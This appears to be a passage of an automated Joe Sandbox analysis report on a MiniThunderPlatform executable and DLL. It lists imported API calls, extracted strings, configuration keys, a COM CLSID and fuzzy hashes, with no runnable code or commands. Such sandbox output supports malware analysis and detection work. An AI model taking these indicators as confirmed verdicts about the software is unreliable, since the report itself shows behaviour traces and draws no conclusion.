                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$?size@?$basic_string@_$?data@?$basic_string@$??1?$basic_string@$??0?$basic_string@?find@?$basic_string@?rend@?$basic_string@A?$basic_string@D@2@@std@@@2@V?$reverse_iterator@Vconst_iterator@?$basic_string@$?empty@?$basic_string@_?end@?$basic_string@V01@V01@@Vconst_iterator@12@Y?$basic_string@
                                                                                                                                              • String ID: http://store.paycenter.uc.cn$mail-attachment.googleusercontent.com
                                                                                                                                              • API String ID: 2249635939-1724680441
                                                                                                                                              • Opcode ID: 2dd8f6cc9ef5ee57a4b63997e51c1e459b062c25744f9e9819b1fdad838af0dc
                                                                                                                                              • Instruction ID: 066bf038f56cc16361b5249d0fcda2599b46d5e5efeb250fdf9e3778dc7c4e7d
                                                                                                                                              • Opcode Fuzzy Hash: 2dd8f6cc9ef5ee57a4b63997e51c1e459b062c25744f9e9819b1fdad838af0dc
                                                                                                                                              • Instruction Fuzzy Hash: E54251718005289FD760EB55DC96BEDB775EB08308F0541AEE50AA7291CF386EC8CF99

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(http_data_pipe), ref: 100A6AB0
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 100A6B4E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 100A6B6E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 100A6B87
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A6BFB
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(zh-CN,zh;q=0.5,en;q=0.5), ref: 100A6C50
                                                                                                                                                • Part of subcall function 10027700: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,?,?,?,100291DB,00000000), ref: 1002771C
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027729
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027736
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027743
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027750
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1002775F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@V12@$?assign@?$basic_string@V12@@$?erase@?$basic_string@
                                                                                                                                              • String ID: +$+$,$.\http_data_pipe.cpp$GetAcceptLanguagesA$Shlwapi.dll$dispatch$enable_fetch_cookie$enable_parse_ref$false$http$http_data_pipe$http_min_expected_sum_length$thunder_assert$timeout_sec$zh-CN,zh;q=0.5,en;q=0.5
                                                                                                                                              • API String ID: 1722151385-731933024
                                                                                                                                              • Opcode ID: a92cb598fed6fae54085db965d889546469010decc1a9c083a0ece6064ec918c
                                                                                                                                              • Instruction ID: a4cdda2590aec21dfd800715f4878f85d3250d1437415fac0b404c8fcb9a1c41
                                                                                                                                              • Opcode Fuzzy Hash: a92cb598fed6fae54085db965d889546469010decc1a9c083a0ece6064ec918c
                                                                                                                                              • Instruction Fuzzy Hash: DC125975108781DFD324CF68C888B9BBBE4FFA9304F44895DE5AA47252DB70A548CF62

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001C182
                                                                                                                                                • Part of subcall function 10019A36: __EH_prolog.LIBCMT ref: 10019A3B
                                                                                                                                                • Part of subcall function 1001A696: __EH_prolog.LIBCMT ref: 1001A69B
                                                                                                                                                • Part of subcall function 1001A696: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,1001C201,00000000,00000000), ref: 1001A6A8
                                                                                                                                                • Part of subcall function 1001A696: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,1001C201,00000000,00000000), ref: 1001A6B6
                                                                                                                                                • Part of subcall function 10016736: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,1001C210,00000000,00000000), ref: 10016739
                                                                                                                                                • Part of subcall function 10001000: RtlInitializeCriticalSection.NTDLL(?), ref: 1000100D
                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000), ref: 1001C280
                                                                                                                                              • GetTickCount.KERNEL32 ref: 1001C28C
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,7C3F18B8), ref: 1001C2AC
                                                                                                                                                • Part of subcall function 10013610: ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71 ref: 10013678
                                                                                                                                                • Part of subcall function 10013610: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP71(?,00000000,00000001), ref: 10013690
                                                                                                                                                • Part of subcall function 10013610: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,102404D3,000000FF,1001C2E6,?,?,00000000), ref: 100136B1
                                                                                                                                                • Part of subcall function 10001429: __EH_prolog.LIBCMT ref: 1000142E
                                                                                                                                                • Part of subcall function 10001429: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,10277ABC), ref: 10001441
                                                                                                                                                • Part of subcall function 10001429: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10001452
                                                                                                                                                • Part of subcall function 10001429: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1000145C
                                                                                                                                                • Part of subcall function 10001429: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1000146C
                                                                                                                                              • _putenv.MSVCR71(?,?,?,00000000), ref: 1001C316
                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 1001C319
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C34D
                                                                                                                                              • _putenv.MSVCR71(1027AD80), ref: 1001C392
                                                                                                                                              • GetLastError.KERNEL32 ref: 1001C395
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(asyn_frame.dll), ref: 1001C3CC
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(asyn_frame_dll), ref: 1001C3E1
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(com_plugin), ref: 1001C3F7
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?,?,?), ref: 1001C433
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C443
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C453
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C463
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C473
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71({A091AD25-4931-4569-9EC2-14FF003DE671}), ref: 1001C484
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(asyn_frame_clsid), ref: 1001C499
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(com_plugin), ref: 1001C4AA
                                                                                                                                                • Part of subcall function 10015928: __EH_prolog.LIBCMT ref: 1001592D
                                                                                                                                                • Part of subcall function 10015928: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,00000000,?,00000017), ref: 10015976
                                                                                                                                                • Part of subcall function 10015928: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000017), ref: 10015991
                                                                                                                                                • Part of subcall function 10015928: RtlLeaveCriticalSection.NTDLL(-00000004), ref: 1001599E
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?,?,?), ref: 1001C4E6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C4F6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C506
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C516
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C526
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C53C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C54C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C559
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C566
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C573
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001C580
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$H_prologV12@$V12@@$?assign@?$basic_string@CriticalErrorLastSectionV01@@_putenv$?append@?$basic_string@?erase@?$basic_string@?rfind@?$basic_string@?substr@?$basic_string@CountCreateEventInitializeLeaveTick
                                                                                                                                              • String ID: DOWNLOG_ROOT=$THUNDER_HOME=$asyn_frame.dll$asyn_frame_clsid$asyn_frame_dll$com_plugin$download_log\$prop.txt${A091AD25-4931-4569-9EC2-14FF003DE671}
                                                                                                                                              • API String ID: 2180693992-3392846211
                                                                                                                                              • Opcode ID: d797e88c20912f0b79eff0e09e95012e408c8e83dc539a7964defd79ed3f5ec9
                                                                                                                                              • Instruction ID: 6d9f1b8b60f806b3b9c71144add82350b0d12458a54662a6e3de6a7ab1c2fab2
                                                                                                                                              • Opcode Fuzzy Hash: d797e88c20912f0b79eff0e09e95012e408c8e83dc539a7964defd79ed3f5ec9
                                                                                                                                              • Instruction Fuzzy Hash: 42C14E74800259DFDB25CBA4C988BDEBBF8EF29304F04849DE54A93251DB706788DF21

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001B49E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1001B4C5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1001B4D7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001B910
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001B91D
                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 1001B935
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001B959
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 1001B966
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001B976
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001B983
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001B990
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@V01@@$??1?$basic_string@_FreeH_prologLibraryU?$char_traits@_V?$allocator@_W@2@@std@@W@std@@
                                                                                                                                              • String ID: dl_peer_id.dll
                                                                                                                                              • API String ID: 3699617589-3148526724

                                                                                                                                              Control-flow Graph (graph starts at block 100b0650-100b069b)
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100B06D0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B06E1
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 100B070E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(user_id), ref: 100B0728
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(env), ref: 100B073F
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100B077B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B078D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B079F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B07B1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B07C2
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B07EA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B07FB
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(xl_dl_minitp), ref: 100B080A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(tp_service_name), ref: 100B0824
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(env), ref: 100B083B
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?,?,?), ref: 100B0877
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B0889
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B089B
                                                                                                                                                • Part of subcall function 100E986D: __EH_prolog.LIBCMT ref: 100E9872
                                                                                                                                                • Part of subcall function 100E986D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100B06A4,?), ref: 100E9893
                                                                                                                                                • Part of subcall function 100E986D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B06A4,?), ref: 100E98A3
                                                                                                                                                • Part of subcall function 100E986D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B06A4,?), ref: 100E98B3
                                                                                                                                                • Part of subcall function 100E986D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B06A4,?), ref: 100E98C3
                                                                                                                                                • Part of subcall function 100E986D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B06A4,?), ref: 100E98D3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B08AD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B08BE
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100B08D2
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100B0903
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B0914
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B0970
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B0984
                                                                                                                                                • Part of subcall function 1000F910: ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 1000F976
                                                                                                                                                • Part of subcall function 1000F910: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71(?,0000002E,?,0000002E,?,0000002E,?), ref: 1000F9A1
                                                                                                                                                • Part of subcall function 1000F910: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@D@Z.MSVCP71(00000000), ref: 1000F9AE
                                                                                                                                                • Part of subcall function 1000F910: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71 ref: 1000F9B5
                                                                                                                                                • Part of subcall function 1000F910: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@D@Z.MSVCP71(00000000), ref: 1000F9BC
                                                                                                                                                • Part of subcall function 1000F910: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71 ref: 1000F9C3
                                                                                                                                                • Part of subcall function 1000F910: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@D@Z.MSVCP71(00000000), ref: 1000F9CA
                                                                                                                                                • Part of subcall function 1000F910: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP71 ref: 1000F9D1
                                                                                                                                                • Part of subcall function 1000F910: ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 1000F9E3
                                                                                                                                                • Part of subcall function 1000F910: ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 1000F9F8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@std@@@std@@$?assign@?$basic_string@V12@V12@@$??6?$basic_ostream@V01@$??$?6D@std@@@0@V10@V?$basic_ostream@$??0?$basic_stringstream@?str@?$basic_stringstream@D?$basic_stringstream@D@2@@2@FileH_prologModuleNameV?$basic_string@malloc
                                                                                                                                              • String ID: env$tp_service_name$user_id$xl_dl_minitp
                                                                                                                                              • API String ID: 1040288741-3865713830

                                                                                                                                              Control-flow Graph (graph starts at block 422310-422360)
                                                                                                                                              APIs
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 004223D3
                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 004223E7
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00422406
                                                                                                                                              • GetLastError.KERNEL32 ref: 00422425
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 0042244F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(80000055), ref: 00422499
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(id.dat), ref: 004224CA
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 004224DF
                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(partner,0044818C,80000055,?,00001000,00000000), ref: 0042250A
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 0042257C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 00422595
                                                                                                                                              • ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP71 ref: 004225A7
                                                                                                                                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP71(00000000), ref: 004225BA
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004225FD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 00422613
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00422696
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004226FC
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00422725
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(new memory failed!), ref: 0042283E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 0042287F
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 004228A1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
